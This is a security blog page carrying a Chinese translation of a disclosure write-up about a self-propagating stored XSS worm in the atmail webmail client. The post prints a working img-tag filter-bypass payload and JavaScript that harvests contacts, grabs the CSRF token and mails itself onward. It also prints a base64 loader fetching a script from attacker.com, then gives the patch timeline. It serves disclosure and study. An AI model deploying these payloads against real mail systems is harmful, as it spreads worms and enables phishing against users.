<!doctype html>



  


<html class="theme-next pisces use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>






<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.1" rel="stylesheet" type="text/css" />


  <meta name="keywords" content="xss," />








  <link rel="shortcut icon" type="image/x-icon" href="/uploads/favicon.ico?v=5.1.1" />






<meta name="description" content="本文由高级安全分析师Zach Julian编写。你可以在推特上联系他。 Atmail是一家以云端和本地电子邮件服务著名的供应商。Atmail的客户有普通公司、主机供应商以及包括DreamHost、美国的LegalShield、波斯尼亚的m:tel、iiNet和澳大利亚的Optus互联网服务供应商。">
<meta name="keywords" content="xss">
<meta property="og:type" content="article">
<meta property="og:title" content="【译】看我在atmail上构建XSS蠕虫">
<meta property="og:url" content="/2017/06/26/how-I-built-an-xss-worm-on-atmail/index.html">
<meta property="og:site_name" content="Ꭰ&#39;s security blog">
<meta property="og:description" content="本文由高级安全分析师Zach Julian编写。你可以在推特上联系他。 Atmail是一家以云端和本地电子邮件服务著名的供应商。Atmail的客户有普通公司、主机供应商以及包括DreamHost、美国的LegalShield、波斯尼亚的m:tel、iiNet和澳大利亚的Optus互联网服务供应商。">
<meta property="og:image" content="/2017/06/26/how-I-built-an-xss-worm-on-atmail/DreamHost1.png">
<meta property="og:updated_time" content="2017-07-01T06:49:39.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="【译】看我在atmail上构建XSS蠕虫">
<meta name="twitter:description" content="本文由高级安全分析师Zach Julian编写。你可以在推特上联系他。 Atmail是一家以云端和本地电子邮件服务著名的供应商。Atmail的客户有普通公司、主机供应商以及包括DreamHost、美国的LegalShield、波斯尼亚的m:tel、iiNet和澳大利亚的Optus互联网服务供应商。">
<meta name="twitter:image" content="/2017/06/26/how-I-built-an-xss-worm-on-atmail/DreamHost1.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    sidebar: {"position":"left","display":"post","offset":12,"offset_float":0,"b2t":false,"scrollpercent":false},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="/2017/06/26/how-I-built-an-xss-worm-on-atmail/"/>





  <title>【译】看我在atmail上构建XSS蠕虫 | Ꭰ's security blog</title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  





  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?ca5988953450620ca8c294ff5c390a4a";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>










  
  
    
  

  <div class="container sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Ꭰ's security blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            About
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            Tags
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
    <link itemprop="mainEntityOfPage" href="/2017/06/26/how-I-built-an-xss-worm-on-atmail/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Ꭰ">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/uploads/header.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ꭰ's security blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">【译】看我在atmail上构建XSS蠕虫</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2017-06-26T19:58:00+08:00">
                2017-06-26
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Web/" itemprop="url" rel="index">
                    <span itemprop="name">Web</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          
             <span id="/2017/06/26/how-I-built-an-xss-worm-on-atmail/" class="leancloud_visitors" data-flag-title="【译】看我在atmail上构建XSS蠕虫">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">Visitors </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>本文由高级安全分析师Zach Julian编写。你可以在推特上联系<a href="https://twitter.com/tprime_" target="_blank" rel="external">他</a>。</p>
<p>Atmail是一家以云端和本地电子邮件服务著名的供应商。Atmail的客户有普通公司、主机供应商以及包括DreamHost、美国的LegalShield、波斯尼亚的m:tel、iiNet和澳大利亚的Optus互联网服务供应商。</p>
<a id="more"></a>
<p>作为DreamHost的atmail用户，在漏洞奖励机制工作期间，我曾经历过数个令人记忆犹新的email跨站脚本攻击，所以我打算在atmail的web客户端挖掘前端漏洞。数小时后，我发现了一个能起作用的payload，但想通过构造一只<a href="https://en.wikipedia.org/wiki/XSS_worm" target="_blank" rel="external">xss蠕虫</a>进一步利用。xss蠕虫最出名的案例是<a href="https://en.wikipedia.org/wiki/Samy_(computer_worm" target="_blank" rel="external">05年MySpace遭受攻击</a>)，在那之后2014年<a href="https://nakedsecurity.sophos.com/2014/06/11/twitter-jumps-to-block-xss-worm-in-tweetdeck/" target="_blank" rel="external">TwitterDeck遭05年蠕虫变种的攻击</a>。</p>
<p>本文中，我将详细讲述构造通过利用受害者联系人来自我繁殖的XSS攻击。</p>
<h1 id="测试环境"><a href="#测试环境" class="headerlink" title="测试环境"></a>测试环境</h1><p>在开始前，我准备了简单的测试环境。将xss测试payload通过管道命令写入邮件正文，使用下面的命令发送邮件：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">cat content | mail -a "Content-type: text/html" -s "test" victim1@zjulian.com</div></pre></td></tr></table></figure>
<p>接着我试用了火狐的开发者工具去观察xss的payload是如何在web邮件客户端的DOM中渲染。</p>
<h1 id="构建XSS-Payload"><a href="#构建XSS-Payload" class="headerlink" title="构建XSS Payload"></a>构建XSS Payload</h1><p>首先需要创建一个能够在atmail过滤器保持完整的xss payload。以发送一封包含所有有效的html标签的邮件为开始，接着查看哪些标签会在发送后保留下来，最终我决定使用img标签。img标签非常适合构建xss payload，它的优势在于攻击者必须在atmail中点击显示图像才能出发xss。构建更好的payload应是使用一种不需要用户交互、自身能渲染的标签。</p>
<p>接着，我开始关注atmail是如何过滤我的paylod。为了避开过滤器和在受害者浏览器中渲染出语义正确的标签这两个目的，我需要观察atmail是如何操控img标签中的字符和html属性。通过发送包含所有有效属性的img标签（<code>&lt;img src=&quot;x&quot; align=&quot;left&quot; alt=&quot;test&quot; border=&quot;1px&quot; crossorigin=&quot;anonymous&quot; height=&quot;100px&quot; hspace=&quot;100px&quot; ismap longdesc=&quot;test&quot; sizes=&quot;(min-width: 600px) 200px,</code>），我发现只有src、alt、longdesc、style、height和width属性被允许。此外我还发现了payload上的其他的一些变化，比如单引号变成了双引号，onerror事件被移除，没有src属性的img标签被移除。</p>
<p>尽管onerror事件被移除，我却怀疑单引号转为双引号可能会在白名单的绕过上起作用，如果在img标签中同时使用onerror和单引号的话。最终，怀疑被证实是对的，虽然我不得不在两个img标签中使用了一对双引号。有效的xss payload如下：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">longdesc</span>=<span class="string">"src='x'onerror=alert(document.domain);//&gt;&lt;img "</span> <span class="attr">src</span>=<span class="string">'showme'</span>&gt;</span></div></pre></td></tr></table></figure>
<p>这个xss在web邮件客户端渲染如下：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="tag">&lt;<span class="name">img</span> <span class="attr">longdesc</span>=<span class="string">"src="</span> <span class="attr">images</span>=<span class="string">""</span> <span class="attr">stop.png</span>"=<span class="string">""</span> <span class="attr">onerror</span>=<span class="string">"alert(document.domain);//&amp;quot;"</span> <span class="attr">src</span>=<span class="string">"x"</span> <span class="attr">alt</span>=<span class="string">"showme"</span>&gt;</span></div></pre></td></tr></table></figure>
<p>无法查看应用源码情况下，要想在payload发送前准确知道payload的变化是不可能的。但是，atmail似乎是以这样的方式来解释单双引号—两个img标签合并成一个。在longdesc属性中包含onerror事件能绕过内容过滤器，在邮件内容被过滤后正确的渲染出xss。</p>
<p><img src="/2017/06/26/how-I-built-an-xss-worm-on-atmail/DreamHost1.png" alt="DreamHost1"></p>
<h1 id="构建蠕虫"><a href="#构建蠕虫" class="headerlink" title="构建蠕虫"></a>构建蠕虫</h1><p>发现有效的xss向量后，下一步该构建一个能够传播我的emal蠕虫payload了。为此我写了javascript脚本，它执行下面这三步:</p>
<ul>
<li>提取受害者的联系人列表</li>
<li>从atmail中获取有效的csrf token</li>
<li>向受害者的联系人发送邮件</li>
</ul>
<p>脚本代码和下面的示例很像，xss payload包含在url编码的文本中。</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line"><span class="comment">//HTTP request to grab victim's contacts</span></div><div class="line">xmlHttp=<span class="keyword">new</span> XMLHttpRequest();</div><div class="line">xmlHttp.open(<span class="string">'GET'</span>,<span class="string">'/index.php/mail/contacts/viewcontacts/GroupID/0'</span>,<span class="literal">false</span>);</div><div class="line">xmlHttp.send(<span class="literal">null</span>);</div><div class="line">response=xmlHttp.responseText;</div><div class="line"></div><div class="line"><span class="comment">//Extract email addresses and filter duplicates</span></div><div class="line"><span class="keyword">var</span> extractedemails = response.match(<span class="regexp">/[A-Z0-9._%+-]+@[A-Z0-9.-]+.[A-Z]&#123;2,4&#125;/igm</span>);</div><div class="line"><span class="keyword">var</span> uniqueemails = []; </div><div class="line"><span class="keyword">for</span>(<span class="keyword">var</span> i = <span class="number">0</span>; i &lt; extractedemails.length; i++)&#123;<span class="keyword">if</span> (uniqueemails.indexOf(extractedemails[i]) == <span class="number">-1</span>) uniqueemails.push(extractedemails[i]);&#125;</div><div class="line"></div><div class="line"><span class="comment">//HTTP request to get CSRF token</span></div><div class="line">xmlHttp.open(<span class="string">'GET'</span>,<span class="string">'/index.php/mail/contacts'</span>,<span class="literal">false</span>);</div><div class="line">xmlHttp.send(<span class="literal">null</span>);</div><div class="line">response2=xmlHttp.responseText;</div><div class="line"><span class="keyword">var</span> csrftoken = response2.match(<span class="regexp">/name=\"atmailCSRF" value=\"(.+?)\"/im</span>);</div><div class="line"></div><div class="line"><span class="comment">//Loop through contacts and send email</span></div><div class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i &lt; uniqueemails.length; i++) &#123;</div><div class="line">	xmlHttp.open(<span class="string">'POST'</span>,<span class="string">'/index.php/mail/composemessage/send'</span>,<span class="literal">false</span>);</div><div class="line">	<span class="keyword">var</span> params = <span class="string">'atmailCSRF='</span> + csrftoken[<span class="number">1</span>] + <span class="string">'&amp;emailTo='</span> + unique[i] + <span class="string">'&amp;emailSubject=open%20me&amp;emailBodyHtml=%3c%68%33%3e%61%74%6d%61%69%6c%20%65%6d%61%69%6c%20%58%53%53%20%77%6f%72%6d%3c%2f%68%33%3e%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0a%3c%69%6d%67%20%6c%6f%6e%67%64%65%73%63%3d%22%73%72%63%3d%27%78%27%6f%6e%65%72%72%6f%72%3d%65%76%61%6c%28%77%69%6e%64%6f%77%2e%61%74%6f%62%28%27%61%57%35%6a%62%48%56%6b%5a%54%31%6b%62%32%4e%31%62%57%56%75%64%43%35%6a%63%6d%56%68%64%47%56%46%62%47%56%74%5a%57%35%30%4b%43%64%7a%59%33%4a%70%63%48%51%6e%4b%54%74%70%62%6d%4e%73%64%57%52%6c%4c%6e%4e%79%59%7a%30%6e%61%48%52%30%63%48%4d%36%4c%79%39%68%64%48%52%68%59%32%74%6c%63%69%35%6a%62%32%30%76%59%58%52%74%59%57%6c%73%4c%6d%70%7a%4a%7a%74%6b%62%32%4e%31%62%57%56%75%64%43%35%6f%5a%57%46%6b%4c%6d%46%77%63%47%56%75%5a%45%4e%6f%61%57%78%6b%4b%47%6c%75%59%32%78%31%5a%47%55%70%4f%77%3d%3d%27%29%29%3b%2f%2f%3e%3c%69%6d%67%20%22%20%73%72%63%3d%27%73%68%6f%77%6d%65%27%3e'</span>;</div><div class="line">	xmlHttp.setRequestHeader(<span class="string">'Content-type'</span>, <span class="string">'application/x-www-form-urlencoded'</span>);</div><div class="line">	xmlHttp.send(params);</div></pre></td></tr></table></figure>
<p>最初，我尝试将压缩的脚本进行base64编码处理，并将其放在payload的onerror事件中。然后它将被解码并使用<code>eval(atob())</code>执行，如下：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&lt;img longdesc=<span class="string">" xss/ src='x'onerror=eval(window.atob('eGg9bmV3IFhNTEh0dHBS…omitted for brevity…'));//&gt;&lt;img "</span> src=<span class="string">'showme'</span>&gt;</div></pre></td></tr></table></figure>
<p>但是，我注意到了atmail限制了base64编码的字符长度为954个字符，这实在是太短了。于是我用外部链接来托管这段脚本而不是在onerror事件中引入整段脚本代码，接着重写了xss payload：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">onerror=<span class="string">"include=document.createElement('script');include.src='https://attacker.com/atmail.js';document.head.appendChild(include);"</span></div></pre></td></tr></table></figure>
<p>上面这个payload在页面的head元素中创建了引用了托管的恶意javascript代码的script标签。最终payload也是base64编码的：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">&lt;img longdesc=<span class="string">"src='x'onerror=eval(window.atob('aW5jbHVkZT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtpbmNsdWRlLnNyYz0naHR0cHM6Ly9hdHRhY2tlci5jb20vYXRtYWlsLmpzJztkb2N1bWVudC5oZWFkLmFwcGVuZENoaWxkKGluY2x1ZGUpOw=='));//&gt;&lt;img "</span> src=<span class="string">'showme'</span>&gt;</div></pre></td></tr></table></figure>
<p>万事俱备，蠕虫已经发作。视频详细展示了它的行为：<a href="https://youtu.be/pIfAAyQ8ggY" target="_blank" rel="external">点我</a>(Youtube视频，请自带梯子)</p>
<p>垃圾信息发布者和其他恶意行为者通过atmail的xss蠕虫获取利益，他们可以操控受害者向熟人发送任意信息。因为蠕虫的病毒天性和邮件是来自熟人的附加信任特性，这种攻击非常适合谣言、恶意软件传播或钓鱼攻击。</p>
<h1 id="信息披漏时间线"><a href="#信息披漏时间线" class="headerlink" title="信息披漏时间线"></a>信息披漏时间线</h1><p>在发现这个漏洞后，我开始对atmail的信息披漏负责。截至2017年5月25日，他们已经修复了这个问题，将atmail升级到版本7.8.0.2即可。</p>
<ul>
<li>2017-02-24  报告漏洞</li>
<li>2017-02-27  报告被接受</li>
<li>2017-05-25  发布补丁</li>
</ul>
<h2 id="更多信息"><a href="#更多信息" class="headerlink" title="更多信息"></a>更多信息</h2><ul>
<li><a href="https://www.bishopfox.com/news/2017/06/atmail-7-stored-xss-vulnerability/" target="_blank" rel="external">官方说明</a></li>
</ul>

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <div>
      
        

      
    </div>

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/xss/" rel="tag"># xss</a>
          
        </div>
      

      
        
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2017/06/24/use-python-to-detect-and-bypass-web-application-firewall/" rel="next" title="【译】使用python检测和绕过web防火墙">
                <i class="fa fa-chevron-left"></i> 【译】使用python检测和绕过web防火墙
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2017/07/01/imagemagick-rce-vulnerability/" rel="prev" title="【译】Imagemagick远程代码执行漏洞">
                【译】Imagemagick远程代码执行漏洞 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
      <div id="lv-container" data-id="city" data-uid="MTAyMC8yODY0MC81MjEx"></div>
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap" >
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            Overview
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image"
               src="/uploads/header.png"
               alt="Ꭰ" />
          <p class="site-author-name" itemprop="name">Ꭰ</p>
           
              <p class="site-description motion-element" itemprop="description">Just another infosec lover blog</p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives">
                <span class="site-state-item-count">32</span>
                <span class="site-state-item-name">posts</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-categories">
              <a href="/categories/index.html">
                <span class="site-state-item-count">15</span>
                <span class="site-state-item-name">categories</span>
              </a>
            </div>
          

          
            
            
            <div class="site-state-item site-state-tags">
              <a href="/tags/index.html">
                <span class="site-state-item-count">35</span>
                <span class="site-state-item-name">tags</span>
              </a>
            </div>
          

        </nav>

        

        <div class="links-of-author motion-element">
          
        </div>

        
        

        
        
          <div class="links-of-blogroll motion-element links-of-blogroll-inline">
            <div class="links-of-blogroll-title">
              <i class="fa  fa-fw fa-globe"></i>
              Links
            </div>
            <ul class="links-of-blogroll-list">
              
                <li class="links-of-blogroll-item">
                  <a href="http://suroot.cn" title="c0rpse" target="_blank">c0rpse</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.fangheart.top/" title="FangHeart" target="_blank">FangHeart</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.th1s.cn" title="th1s" target="_blank">th1s</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="http://www.cnblogs.com/lcamry" title="Icamry" target="_blank">Icamry</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://github.com/cure53" title="Cure53" target="_blank">Cure53</a>
                </li>
              
                <li class="links-of-blogroll-item">
                  <a href="https://www.yunqingqing.com" title="YunQing" target="_blank">YunQing</a>
                </li>
              
            </ul>
          </div>
        

        


      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#测试环境"><span class="nav-number">1.</span> <span class="nav-text">测试环境</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#构建XSS-Payload"><span class="nav-number">2.</span> <span class="nav-text">构建XSS Payload</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#构建蠕虫"><span class="nav-number">3.</span> <span class="nav-text">构建蠕虫</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#信息披漏时间线"><span class="nav-number">4.</span> <span class="nav-text">信息披漏时间线</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#更多信息"><span class="nav-number">4.1.</span> <span class="nav-text">更多信息</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright" >
  
  &copy; 
  <span itemprop="copyrightYear">2017</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ꭰ</span>
</div>


<div class="powered-by">
  Powered by <a class="theme-link" href="https://hexo.io">Hexo</a>
</div>

<div class="theme-info">
  Theme -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Pisces
  </a>
</div>


        

        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.1"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.1"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.1"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.1"></script>



  


  




	





  





  





  
    <script type="text/javascript">
      (function(d, s) {
        var j, e = d.getElementsByTagName(s)[0];
        if (typeof LivereTower === 'function') { return; }
        j = d.createElement(s);
        j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
        j.async = true;
        e.parentNode.insertBefore(j, e);
      })(document, 'script');
    </script>
  






  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.1.js"></script>
  <script>AV.initialize("4uBSvV1VfS66JnxARLfv7BLu-gzGzoHsz", "0bxJ6KeAL6WiGATTp6QW4FpN");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  

  

  

  <script type="text/javascript" src="/js/src/love.js"></script>
</body>
</html>
